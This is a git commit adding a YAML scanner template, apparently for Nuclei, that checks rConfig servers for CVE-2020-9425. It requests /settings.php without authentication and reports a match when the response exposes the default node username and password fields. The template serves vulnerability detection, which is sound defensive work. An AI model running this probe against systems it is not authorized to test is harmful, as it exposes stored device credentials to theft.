Create CVE-2020-9425.yaml
parent
f55ce896ca
commit
4ddfc3b1ef
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2020-9425
|
||||
info:
|
||||
name: rConfig Unauthenticated Sensitive Information Disclosure
|
||||
author: madrobot
|
||||
severity: high
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9425
|
||||
tags: Information Disclosure
|
||||
|
||||
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/settings.php"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "defaultNodeUsername"
|
||||
- "defaultNodePassword"
|
||||
part: body
|
Loading…
Reference in New Issue